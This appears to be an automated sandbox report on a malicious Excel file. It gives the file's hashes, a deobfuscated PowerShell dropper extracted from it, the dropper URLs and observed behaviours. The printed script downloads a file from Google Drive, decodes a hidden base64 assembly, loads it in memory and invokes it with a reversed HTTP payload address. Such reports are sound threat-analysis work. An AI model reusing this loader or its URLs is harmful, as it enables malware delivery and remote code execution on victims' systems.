General

  • Target

    8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xlsx

  • Size

    645KB

  • Sample

    241107-c9yg9sspgs

  • MD5

    0f35365b3df2274c5f34bd63be285912

  • SHA1

    52571d67c3f6bb3db33dfb79bf157b181c6e9b6a

  • SHA256

    8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635

  • SHA512

    e68276ad9a3cf89f3ce721dce123515efce9a22061ecde74d6662689c34229575dcfa72ff9a606a9148d07877f6b4b74397500d26bf206b56554df0377ba3dac

  • SSDEEP

    12288:ebWNHd0zBVnumU9j/rVDWHlYG7GKanCl3qnklaYr+Uf:Ksd2u3FDWHlpVKXYr3

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
invoke-expression "$imageUrl = 'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.GFSSWZ/211/031.16.271.701//:ptth', 'desativado', 'desativado', 'desativado', 'aspnet_regbrowsers', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"

# powershell snippet 1
$imageurl = "https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 "
$webclient = new-object system.net.webclient
$imagebytes = $webclient.downloaddata("https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 ")
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
$startflag = "<<BASE64_START>>"
$endflag = "<<BASE64_END>>"
$startindex = $imagetext.indexof("<<BASE64_START>>")
$endindex = $imagetext.indexof("<<BASE64_END>>")
$startindex -ge 0 -and $endindex -gt $startindex
$startindex = $startflag.length
$base64length = $endindex - $startindex
$base64command = $imagetext.substring($startindex, $base64length)
$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]
$commandbytes = [system.convert]::frombase64string($base64reversed)
$loadedassembly = [system.reflection.assembly]::load($commandbytes)
$vaimethod = ([dnlib.io.home]).getmethod("VAI")
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Targets

    • Target

      8cd8de65f269a3096ab4090427fcb0d5f5ae99229f29465bc2bdb2c2ba304635.xlsx

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Evasion via Device Credential Deployment

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
